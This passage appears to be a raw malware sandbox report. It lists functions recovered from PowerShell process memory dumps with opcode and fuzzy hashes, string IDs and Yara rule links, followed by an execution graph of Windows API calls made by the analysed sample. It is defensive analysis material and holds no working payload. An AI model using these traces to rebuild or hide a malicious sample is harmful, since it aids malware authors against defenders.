                                      • Opcode Fuzzy Hash: 1bd138edd36ee8df28d97aa3e0b6d52526055379dbb4f92364d62a8ff2ffe4ac
                                      • Instruction Fuzzy Hash: 87E02B31708040F78B08C26DD4004FAFF72DFCA320F04847ED547E7240CA21682697D0
                                      Function 04CC8A4A Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0fb308c450ec12a2a055a8cef7dd5fad09c325587d20212ad35f68ac38249da0
                                      • Instruction ID: 6428b962141e693599f52f271b230454966ba1b1340fbca852103e7d061bd7d4
                                      • Opcode Fuzzy Hash: 0fb308c450ec12a2a055a8cef7dd5fad09c325587d20212ad35f68ac38249da0
                                      • Instruction Fuzzy Hash: 9EF0A0307092A45BCB0AA77594186AEBF72DBC1724F0401AED64AC7283CFA8080A8796
                                      Function 04CCB078 Relevance: .0, Instructions: 28COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ba7d2213353ac0ed3adcfffe764cd11936e47378145baeb4a59496a9645b5c16
                                      • Instruction ID: 26c596da8fbb3f177b40f33b15c861bde2d267b87feef51bf7c00727f1db6aaf
                                      • Opcode Fuzzy Hash: ba7d2213353ac0ed3adcfffe764cd11936e47378145baeb4a59496a9645b5c16
                                      • Instruction Fuzzy Hash: FEE0D82170D2D11A8B16813D64514A6AF738AC722031D85FEE085CF257D8529C478351
                                      Function 04CC9250 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 58ace453cd7140e45a5e3ca8b433cfc014404229857ba35d165a8262fa8be511
                                      • Instruction ID: 739f238de4ab001b860f2f13cf6b9324a053f1551cb26cb4981ff3b56c02ddb0
                                      • Opcode Fuzzy Hash: 58ace453cd7140e45a5e3ca8b433cfc014404229857ba35d165a8262fa8be511
                                      • Instruction Fuzzy Hash: ECF06D709003188BD760DFB8D49839ABBE5EB44310F10446DE64EC3340DF796980CB90
                                      Function 04CC8A58 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 58d547af867c0056082de27cd66295801246bb65bbe0c03f6a5cdfc9a8168c88
                                      • Instruction ID: 5e6b8ed569840e9cda3f256b86f41b80e8a5464e2df21d51fb8fc205b66cb2ae
                                      • Opcode Fuzzy Hash: 58d547af867c0056082de27cd66295801246bb65bbe0c03f6a5cdfc9a8168c88
                                      • Instruction Fuzzy Hash: 4BE0863570462897CF0DB775A41C2AEBA5BEBC4729F14006ED60AC3381CFB9590687D9
                                      Function 04CC9638 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e525a0c0a6a09cb73f4778173e5db7a83d455ea3517f8990039869c7524d252
                                      • Instruction ID: c5538fb2e5e59179f0ac9d865dae45ebe6233bd264fda5d964bbf7bed627c386
                                      • Opcode Fuzzy Hash: 3e525a0c0a6a09cb73f4778173e5db7a83d455ea3517f8990039869c7524d252
                                      • Instruction Fuzzy Hash: CBD05E1230112247169431BA58106BBA1DF8ED95AB705013EEA08D7381ED54EC0153F1
                                      Function 04CCDDD0 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                      • Instruction ID: fff76a13be75614b5ff681de659afd6f0bde099df300741da3ffad7af787b7de
                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                      • Instruction Fuzzy Hash: DEE08631B04018A78B08D59AD4104D9F7A6DBCC220F04847FD90AA7340DA32691687D1
                                      Function 04CCDD80 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3b09d4c57e2dbb8f452abff748b2e23a8c4202e0a57452342879aee0f91dfe9f
                                      • Instruction ID: 3f75b14a9f99ef6726248bb09661a30d53f1dd9aedb1934847018eb9c83472ff
                                      • Opcode Fuzzy Hash: 3b09d4c57e2dbb8f452abff748b2e23a8c4202e0a57452342879aee0f91dfe9f
                                      • Instruction Fuzzy Hash: 48E0C231B006141B8726662EA81085F7BEBDFC9AB6320883EE10AC7300DF64ED0647E5
                                      Function 04CC8819 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5138f69d37f4ad612d774c3ea0d7c6360b9ad46965d0d28fb38f33ca368a2a67
                                      • Instruction ID: d3c00dedb0a7e25b9b5b8026c3298d8220b9658f63f665fc34e7667c6dffdb70
                                      • Opcode Fuzzy Hash: 5138f69d37f4ad612d774c3ea0d7c6360b9ad46965d0d28fb38f33ca368a2a67
                                      • Instruction Fuzzy Hash: C8E04F3190815D9BCF49EBB4D85A4EE7F34EB15301B5044DDDA9782192EA611947CB81
                                      Function 04CCF950 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7395938fc225eecfed852cd6ccc6653aa350993ad615c6d8021454a9755d66fb
                                      • Instruction ID: 4d153c072dcbcb5b81c20d7e1dd84f23c38d61bdf145d23d6a19b60cc9697b19
                                      • Opcode Fuzzy Hash: 7395938fc225eecfed852cd6ccc6653aa350993ad615c6d8021454a9755d66fb
                                      • Instruction Fuzzy Hash: 86E06570C0024AAF8B40DFB9C84226AFFF0AF09200B2080AEC849DB201E6319641CB91
                                      Function 04CC88E0 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9fdc3d07e2526ec2a3ceb501d8278d01b165f315beb765dbdf487bc9370c4974
                                      • Instruction ID: b4547eca0ab6810c5f173eee00f9c66693796274daa5e45e3d111eb8d0264ba3
                                      • Opcode Fuzzy Hash: 9fdc3d07e2526ec2a3ceb501d8278d01b165f315beb765dbdf487bc9370c4974
                                      • Instruction Fuzzy Hash: 15E04F30E0928A9BCB59DBB8D44686FBFB1EB46214B2442ADD98AD7203D6311846CF81
                                      Function 04CCF960 Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                      • Instruction ID: a53fd4c8a195e5a30fb90ed75c5b83287d687a5d6fd04a9a8cc570e69c540c01
                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                      • Instruction Fuzzy Hash: C5D06270D0420D9F8780DFADC94156DFBF5EB49214F6485AEC919D7341F73156128BD1
                                      Function 04CC88F0 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8bc44f3e4de3e4391c454e245b4a53b207226b00ec85ba5af19be0d6f1d5b0c0
                                      • Instruction ID: 29d0fe79647321c907698185cb68ad8ddcdec519ec4245bea64e23a43d2c0b64
                                      • Opcode Fuzzy Hash: 8bc44f3e4de3e4391c454e245b4a53b207226b00ec85ba5af19be0d6f1d5b0c0
                                      • Instruction Fuzzy Hash: 94D01734A0420E8B8B48EFA8E45687EBBB6EB45201F1041A9DD09D3340EA306841CBC1
                                      Function 04CC8828 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1688cd930c972c35a99895f101dcc18a1223c8fcf7275313035d0e36112d0938
                                      • Instruction ID: 654bc8176bbc471939340cc0a5bc595b9fa72afcca49f4c8cc24ceb1e1268615
                                      • Opcode Fuzzy Hash: 1688cd930c972c35a99895f101dcc18a1223c8fcf7275313035d0e36112d0938
                                      • Instruction Fuzzy Hash: D7D0173080411D8BCF48EBA4E81A4BEBB34FA10302F5001ADD91792191EA702A4ACBC0
                                      Function 04CC7A00 Relevance: .0, Instructions: 14COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 272ea38b5f4cf391f0cd08e46d84915ac80f25e929e8a5eb814af0b2026d8305
                                      • Instruction ID: 533852b4cf0a93b7db3390c29815df2f75e336bce458b74128610170d0a05ad0
                                      • Opcode Fuzzy Hash: 272ea38b5f4cf391f0cd08e46d84915ac80f25e929e8a5eb814af0b2026d8305
                                      • Instruction Fuzzy Hash: 71D01270042706AFC70A5FAF940C4243725EB4170574818EDE58F4B272EA76E941CF54
                                      Function 04CC7F71 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38a571d01c33c0500e7150f295eecfed4bf11ec9493ff4b46a2df6a4c87ac8c9
                                      • Instruction ID: 44af1e1922b95b1707a71ee55365e18a6df6d6824c5c446f959d1df4241b4862
                                      • Opcode Fuzzy Hash: 38a571d01c33c0500e7150f295eecfed4bf11ec9493ff4b46a2df6a4c87ac8c9
                                      • Instruction Fuzzy Hash: B8C012369193919FEF1E8F3088A61267F329B4324130A889AD1828B492CA340808C715
                                      Function 04CC7A08 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dc9253a3fd116cc57b1365a421dbeb4ebbd37b4ac90986b24ff1c7c8a0b08e87
                                      • Instruction ID: e570a8391b3cd7f5316e76dbfd470261808d880440e01c8787aab6236800a9d8
                                      • Opcode Fuzzy Hash: dc9253a3fd116cc57b1365a421dbeb4ebbd37b4ac90986b24ff1c7c8a0b08e87
                                      • Instruction Fuzzy Hash: DFB092300447098FC2086FBAA4048247329BB4120578408A9E94E0A2A68E37E840CA44

                                      Non-executed Functions

                                      Function 07800488 Relevance: 9.2, Strings: 7, Instructions: 494COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fiq$4'dq$4'dq$4'dq$4'dq$r)l$r)l
                                      • API String ID: 0-4034502829
                                      • Opcode ID: 7c31d625cc0277acf7a9d4c1f48326cababb6cc361af48c4b123fc61570200a0
                                      • Instruction ID: 994d4f7cbbdce05c2c5c9a635fc702b4f338a37b8d1f6e37696f99063e8ba2e4
                                      • Opcode Fuzzy Hash: 7c31d625cc0277acf7a9d4c1f48326cababb6cc361af48c4b123fc61570200a0
                                      • Instruction Fuzzy Hash: E9F168B5B043498FCB148B699C1177ABBA2AFD2315F14807AD949CB6D1DB31DC82C7E2
                                      Function 04CC7AE8 Relevance: 6.5, Strings: 5, Instructions: 237COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tM)l$`eq$`eq$`eq$`eq
                                      • API String ID: 0-1347174904
                                      • Opcode ID: 282feadbbc120279ac5227a6f23833c2e3fb0fa0f64c44b210d9842362917975
                                      • Instruction ID: b09f85072b04c9664efc466bfef15bb828a03baf96df668decb509a7e3fba414
                                      • Opcode Fuzzy Hash: 282feadbbc120279ac5227a6f23833c2e3fb0fa0f64c44b210d9842362917975
                                      • Instruction Fuzzy Hash: 2CB193B4E0121A9FDB55DFA9D990A9DFBF2FF48300F108629E419AB344DB34A945CF90
                                      Function 04CC7AF8 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tM)l$`eq$`eq$`eq$`eq
                                      • API String ID: 0-1347174904
                                      • Opcode ID: 29ba5cf452c7a620999949e0947e8d8bbd4883d1250a91bf994347e269cd2b9a
                                      • Instruction ID: 77cfb79f2afc44400d0bac29f91fe9c85e9ac1ab4473a8149dc7b6bfae68b423
                                      • Opcode Fuzzy Hash: 29ba5cf452c7a620999949e0947e8d8bbd4883d1250a91bf994347e269cd2b9a
                                      • Instruction Fuzzy Hash: 8EB19474E0121A9FDB54DFA9D980A9DFBF2FF48300F108629E419AB304DB30A945CF90
                                      Function 07803678 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                      • API String ID: 0-2509493698
                                      • Opcode ID: 86b04abff1c16d1330d729c762178521dad4e11d7d9464cdefbaeb2000cb1c36
                                      • Instruction ID: 6ad549c50beb372127ef1f9ec00a666c9b1260bbaa5d41185ad4993076192473
                                      • Opcode Fuzzy Hash: 86b04abff1c16d1330d729c762178521dad4e11d7d9464cdefbaeb2000cb1c36
                                      • Instruction Fuzzy Hash: 0C5158F570434A9FCB645A6A8C15366BBA2AFD6311F2480BFD805CBAD1DB31C881C7E1
                                      Function 04CC4BA0 Relevance: 5.2, Strings: 4, Instructions: 152COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: m^$m^$m^$m^
                                      • API String ID: 0-3502344340
                                      • Opcode ID: 6e30781b4ed78db5b63d4326a31fb552946b48371d85ce75cb965926ecbb14a3
                                      • Instruction ID: 163b3b01d0cdba7dee53a0f60e4c5cea9734283d18da2aded9f30d5219b87446
                                      • Opcode Fuzzy Hash: 6e30781b4ed78db5b63d4326a31fb552946b48371d85ce75cb965926ecbb14a3
                                      • Instruction Fuzzy Hash: 1651E65190E3D14FD307973958B82D03FB1AF63298B5E45EBC0C9CF1A3D92A584AC7A6
                                      Function 07805798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $dq$$dq$$dq$$dq
                                      • API String ID: 0-185584874
                                      • Opcode ID: f7a0a706263ec6f8755a2b9cca369df56b2cc3598e8782c1b0597043782fc490
                                      • Instruction ID: a35aeeaf67a176f035445017f8af6b1b7fa2a17a45dc52c3732a3656fb03f335
                                      • Opcode Fuzzy Hash: f7a0a706263ec6f8755a2b9cca369df56b2cc3598e8782c1b0597043782fc490
                                      • Instruction Fuzzy Hash: 2A2149B131020A9BDBB45D6A8C05F37BB9BABE0715F24803A9D05CB2C1DD75D9518BB1
                                      Function 04CC4C62 Relevance: 5.1, Strings: 4, Instructions: 68COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: m^$m^$m^$m^
                                      • API String ID: 0-3502344340
                                      • Opcode ID: 76f095f64a1ae36f6fc854e2f89b877b5524cb98bb91df9740b0f03f339201c7
                                      • Instruction ID: 4d837f55ddedc777cac2966852617402726e420e41cd06ba766435517dfdadcf
                                      • Opcode Fuzzy Hash: 76f095f64a1ae36f6fc854e2f89b877b5524cb98bb91df9740b0f03f339201c7
                                      • Instruction Fuzzy Hash: B421EC1190E3D14FC3078B2949B82D03FA1AF632D8F5E44EBC1C98F197D92A945BC75A
                                      Function 0780218F Relevance: 5.1, Strings: 4, Instructions: 62COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J*l$J*l$J*l$J*l
                                      • API String ID: 0-4153767800
                                      • Opcode ID: 2d34e4e7a32a36147598a4bf0c6ccf6ebab0240f13dfa2435af00dc2076234bc
                                      • Instruction ID: c1a2261caaba480311b75ef715aebbdeb2843ce09ee180f47a14cbb76986cbfa
                                      • Opcode Fuzzy Hash: 2d34e4e7a32a36147598a4bf0c6ccf6ebab0240f13dfa2435af00dc2076234bc
                                      • Instruction Fuzzy Hash: 2B1138B16083658FC3154A684C26267BBA1BFE2310B2584A7C444EF6D2C974DC86C7D3
                                      Function 078020FF Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $dq$$dq$J*l$J*l
                                      • API String ID: 0-2054876222
                                      • Opcode ID: 7a7f9c8b29b7ff188144bb4862820ef3060615c8f2d201bb5d21b6fbf29f27f0
                                      • Instruction ID: 57946de03375dfc1346e87f2e2791ff25d18cca7f354ab1aa5412ba99aa90090
                                      • Opcode Fuzzy Hash: 7a7f9c8b29b7ff188144bb4862820ef3060615c8f2d201bb5d21b6fbf29f27f0
                                      • Instruction Fuzzy Hash: C801D2B260D7954FC32746684C26216BFB26FA2310B2A40EBC984DF1A7D9749C46C3A3
                                      Function 07800308 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'dq$4'dq$$dq$$dq
                                      • API String ID: 0-4229963660
                                      • Opcode ID: e55557310e8d35825f6c279cb6522031b00e1ca6f5519ca6fc95e2f3964c3bca
                                      • Instruction ID: 98a4f1d87ecc31b16e3470adf2284454dd657f924fc66e858d4b67f3404bf87b
                                      • Opcode Fuzzy Hash: e55557310e8d35825f6c279cb6522031b00e1ca6f5519ca6fc95e2f3964c3bca
                                      • Instruction Fuzzy Hash: 75018F91B0D39A4FC76716682C20226AFB35F96651B2A40DBC884DF2E3DE254D4683A7

                                      Execution Graph

                                      Execution Coverage:12.3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:17.6%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:26
                                      execution_graph 25113 7ff669ad0d63 25116 7ff669ad1350 25113->25116 25115 7ff669ad0da2 25115->25115 25144 7ff669ad0f10 25116->25144 25119 7ff669ad13de 25162 7ff669ad1298 6 API calls _com_raise_error 25119->25162 25121 7ff669ad13eb RaiseException 25122 7ff669ad1628 25121->25122 25122->25115 25123 7ff669ad1407 25124 7ff669ad1490 LoadLibraryExA 25123->25124 25125 7ff669ad15fc 25123->25125 25127 7ff669ad14fc 25123->25127 25132 7ff669ad1510 25123->25132 25124->25127 25128 7ff669ad14a7 GetLastError 25124->25128 25165 7ff669ad1298 6 API calls _com_raise_error 25125->25165 25126 7ff669ad15da 25152 7ff669ad0e24 25126->25152 25129 7ff669ad1507 FreeLibrary 25127->25129 25127->25132 25133 7ff669ad14d1 25128->25133 25134 7ff669ad14bc 25128->25134 25129->25132 25131 7ff669ad1570 GetProcAddress 25131->25126 25135 7ff669ad1585 GetLastError 25131->25135 25132->25126 25132->25131 25163 7ff669ad1298 6 API calls _com_raise_error 25133->25163 25134->25127 25134->25133 25139 7ff669ad159a 25135->25139 25138 7ff669ad14de RaiseException 25138->25122 25139->25126 25164 7ff669ad1298 6 API calls _com_raise_error 25139->25164 25141 7ff669ad15bc RaiseException 25142 7ff669ad0f10 _com_raise_error 6 API calls 25141->25142 25143 7ff669ad15d6 25142->25143 25143->25126 25145 7ff669ad0f9b 25144->25145 25146 7ff669ad0f26 25144->25146 25145->25119 25145->25123 25146->25145 25166 7ff669ad0fcc 25146->25166 25149 7ff669ad0f96 25151 7ff669ad0fcc _com_raise_error 3 API calls 25149->25151 25151->25145 25153 7ff669ad0e4d 25152->25153 25161 7ff669ad0ea9 25152->25161 25154 7ff669ad0fcc _com_raise_error 3 API calls 25153->25154 25153->25161 25157 7ff669ad0e60 25154->25157 25155 7ff669ad11a0 _com_raise_error 3 API calls 25156 7ff669ad0ed0 25155->25156 25158 7ff669ad0fcc _com_raise_error 3 API calls 25156->25158 25160 7ff669ad11a0 _com_raise_error 3 API calls 25157->25160 25159 7ff669ad0ed5 25158->25159 25159->25125 25160->25161 25161->25155 25161->25159 25162->25121 25163->25138 25164->25141 25165->25122 25167 7ff669ad0f38 25166->25167 25168 7ff669ad0fe7 25166->25168 25167->25149 25173 7ff669ad11a0 25167->25173 25168->25167 25169 7ff669ad0fec GetModuleHandleW 25168->25169 25170 7ff669ad1001 25169->25170 25171 7ff669ad1006 GetProcAddress 25169->25171 25170->25167 25171->25170 25172 7ff669ad101b GetProcAddress 25171->25172 25172->25170 25175 7ff669ad11d2 _com_raise_error 25173->25175 25174 7ff669ad11da 25174->25149 25175->25174 25177 7ff669ad121a VirtualProtect 25175->25177 25179 7ff669ad106c VirtualQuery GetSystemInfo 25175->25179 25177->25174 25179->25177 25180 7ff669ad1850 25181 7ff669ad17d7 25180->25181 25181->25180 25182 7ff669ad1350 _com_raise_error 14 API calls 25181->25182 25182->25181 25183 7ff669aca9c0 25540 7ff669aa26c8 25183->25540 25185 7ff669acaa1d 25186 7ff669acb8fd 25185->25186 25187 7ff669acaa37 25185->25187 25360 7ff669acaa21 25185->25360 25773 7ff669acebf8 25186->25773 25191 7ff669acab3c 25187->25191 25192 7ff669acaa47 25187->25192 25187->25360 25196 7ff669acabf3 25191->25196 25201 7ff669acab56 25191->25201 25194 7ff669acaa4f 25192->25194 25195 7ff669acab0a 25192->25195 25205 7ff669aba008 58 API calls 25194->25205 25194->25360 25200 7ff669acab2c EndDialog 25195->25200 25195->25360 25548 7ff669aa241c GetDlgItem 25196->25548 25197 7ff669acb933 25202 7ff669acb93f SendDlgItemMessageW 25197->25202 25203 7ff669acb95a GetDlgItem SendMessageW 25197->25203 25198 7ff669acb924 SendMessageW 25198->25197 25200->25360 25206 7ff669aba008 58 API calls 25201->25206 25202->25203 25792 7ff669ab55f8 GetCurrentDirectoryW 25203->25792 25209 7ff669acaa8a 25205->25209 25210 7ff669acab74 SetDlgItemTextW 25206->25210 25208 7ff669acb9b4 GetDlgItem 25801 7ff669aa268c 25208->25801 25805 7ff669aa1ecc 34 API calls _handle_error 25209->25805 25215 7ff669acab89 25210->25215 25211 7ff669acac50 25225 7ff669acb57c 25211->25225 25243 7ff669acb79c 25211->25243 25212 7ff669acac69 GetDlgItem 25216 7ff669acac83 SendMessageW SendMessageW 25212->25216 25217 7ff669acacb0 SetFocus 25212->25217 25221 7ff669acab96 GetMessageW 25215->25221 25215->25360 25216->25217 25223 7ff669acacc6 25217->25223 25224 7ff669acad69 25217->25224 25219 7ff669acac2b EndDialog 25356 7ff669acac35 25219->25356 25220 7ff669acaa9d 25226 7ff669acaab6 25220->25226 25806 7ff669aa2678 25220->25806 25227 7ff669acabb4 IsDialogMessageW 25221->25227 25221->25360 25230 7ff669aba008 58 API calls 25223->25230 25562 7ff669aa8a94 25224->25562 25232 7ff669acb584 25225->25232 25367 7ff669acac13 25225->25367 25240 7ff669acbdfa 25226->25240 25226->25360 25227->25215 25234 7ff669acabc9 TranslateMessage DispatchMessageW 25227->25234 25237 7ff669acacd0 25230->25237 25231 7ff669aa1fa8 31 API calls 